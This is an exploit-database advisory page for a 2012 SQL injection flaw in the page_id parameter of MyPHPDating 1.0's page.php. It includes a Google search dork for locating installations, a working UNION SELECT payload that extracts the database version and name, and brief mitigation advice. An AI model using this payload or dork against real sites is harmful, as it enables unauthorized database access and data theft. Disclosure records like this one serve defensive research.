header-logo
Suggest Exploit
vendor:
MyPHPDating
by:
ITTIHACK
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MyPHPDating
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2012

MyPHPDating 1.0 SQL Injection Vulnerability

The vulnerability exists in the 'page.php' file of MyPHPDating version 1.0. An attacker can exploit this vulnerability by injecting SQL code through the 'page_id' parameter. This can lead to unauthorized access, data leakage, and potential remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize and validate user input before using it in SQL queries. Additionally, implementing parameterized queries or prepared statements can help prevent SQL injection attacks.
Source

Exploit-DB raw data:

MyPHPDating 1.0 SQL Injection Vulnerability  \
==============================================\__________________________
       Software : MyPHPDating version 1.0                                \
       Date     : 1/1/2012                                           	  \
       Vendor   : http://www.phponlinedatingsoftware.com/                  \
       Demo     : http://www.phponlinedatingsoftware.com/demo.htm           \
	   Get App. : http://www.phponlinedatingsoftware.com/order.htm           \
       Price    : $149.00	                                                  \
       Dork     : "Powered by MyPHPDating"	                                   \
       Author   : ITTIHACK                                                      \
       Home     : http://ittihack.com                                            \                
==================================================================================                
                                                                                  |_______________________________________|
Vulnerable file : page.php                                                                                                |
Exploit         : http://localhost/[path]/page.php?page_id=[SQL]                                                          |
                  http://localhost/[path]/page.php?page_id=-1+union+select+1,2,3,concat(@@version,0x3c3e,database())--    |
==========================================================================================================================|

 
 Greatz to: Reinie

Navigation

Suggest Exploit

Services By CQR